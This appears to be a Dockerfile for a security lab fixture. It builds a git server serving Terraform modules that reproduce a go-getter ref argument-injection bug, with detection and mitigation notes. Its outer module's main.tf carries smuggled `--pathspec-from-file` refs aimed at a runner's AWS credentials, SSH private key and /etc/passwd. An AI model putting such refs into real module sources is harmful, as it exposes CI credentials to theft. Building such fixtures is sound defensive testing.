# Lab harness: builds a throwaway git server hosting two Terraform modules that
# reproduce a ref argument-injection bug in a go-getter based module fetcher.
# Read it as a detection/mitigation fixture, not as a production image.
#
# Image-hygiene notes (review):
#   - alpine:3.20 is tagged but not digest-pinned, and `apk add` pins no package
#     versions (hadolint DL3018), so rebuilds are not reproducible.
#   - There is no USER directive; the HTTP server at the bottom runs as root.
FROM alpine:3.20
# git builds the two bare repositories; python3 serves them over plain HTTP.
RUN apk add --no-cache git python3
# terraform-aws-vpc-internal: minimal valid module (the one go-getter checks out with the malicious ref)
# Inner repo: a single commit containing one file (`output "result" ...`),
# cloned bare into /srv/git. `git update-server-info` writes info/refs so the
# clone can be served by a dumb HTTP transport (a plain file server). The
# commit identity ("attacker") is a fixture value with no effect on the test.
# NOTE(review): `cd` inside RUN instead of WORKDIR (hadolint DL3003); harmless
# here because the working directory only matters within this one layer.
RUN git init /tmp/vpc-internal && \
cd /tmp/vpc-internal && \
git config user.email "[email protected]" && \
git config user.name "attacker" && \
printf 'output "result" { value = "ok" }\n' > main.tf && \
git add . && git commit -q -m "init" && \
git clone --bare /tmp/vpc-internal /srv/git/terraform-aws-vpc-internal.git && \
git -C /srv/git/terraform-aws-vpc-internal.git update-server-info
# terraform-aws-vpc: legitimate-looking outer module with malicious nested refs
# Outer repo: main.tf declares three nested modules whose `source` points back
# at this same server with a `ref=` query value that begins with `--`. A
# fetcher that passes that value to git as a positional ref, without a `--`
# separator, lets git parse it as an option -- the argument-injection class of
# bug this fixture exercises. The refs name runner-local files (an AWS
# credentials file, an SSH private key, /etc/passwd), so a vulnerable fetcher
# would presumably make git read paths it was never meant to touch -- confirm
# against the fetcher version under test.
#
# Defender notes:
#   - Mitigation (consumer side): use a go-getter release that rejects refs
#     starting with `-` or inserts `--` before the ref (the page's comment
#     implies a fix exists; verify against the fetcher's changelog), allowlist
#     module sources and pin them by commit, and keep long-lived credentials
#     off the runner filesystem (short-lived/OIDC tokens instead).
#   - Detection: alert on module `source` URLs whose `ref=` query value starts
#     with `-`, on git child processes invoked with `--pathspec-from-file`, and
#     on module clones that resolve to hosts outside the approved registry.
RUN git init /tmp/vpc && \
cd /tmp/vpc && \
git config user.email "[email protected]" && \
git config user.name "attacker" && \
printf '%s\n' \
'module "creds" {' \
' source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"' \
'}' \
'module "key" {' \
' source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.ssh/id_rsa"' \
'}' \
'module "passwd" {' \
' source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/etc/passwd"' \
'}' > main.tf && \
git add . && git commit -q -m "init" && \
git clone --bare /tmp/vpc /srv/git/terraform-aws-vpc.git && \
git -C /srv/git/terraform-aws-vpc.git update-server-info
# EXPOSE is documentation only; 80 matches the plain http:// URLs in main.tf.
EXPOSE 80
# Serve from the repositories' parent directory so
# http://gitserver/<name>.git resolves to the bare clone.
WORKDIR /srv/git
# python3's http.server is the dumb git HTTP transport. Exec form plus `exec`
# keeps python as PID 1 so `docker stop` reaches it. `2>/dev/null` discards the
# request log (http.server logs to stderr), so the fixture records nothing about
# which client fetched what -- drop the redirect if those fetches are wanted as
# evidence during a test run.
# NOTE(review): binds port 80 as root; no HEALTHCHECK (acceptable for a
# one-shot lab container).
CMD ["sh", "-c", "exec python3 -m http.server 80 2>/dev/null"]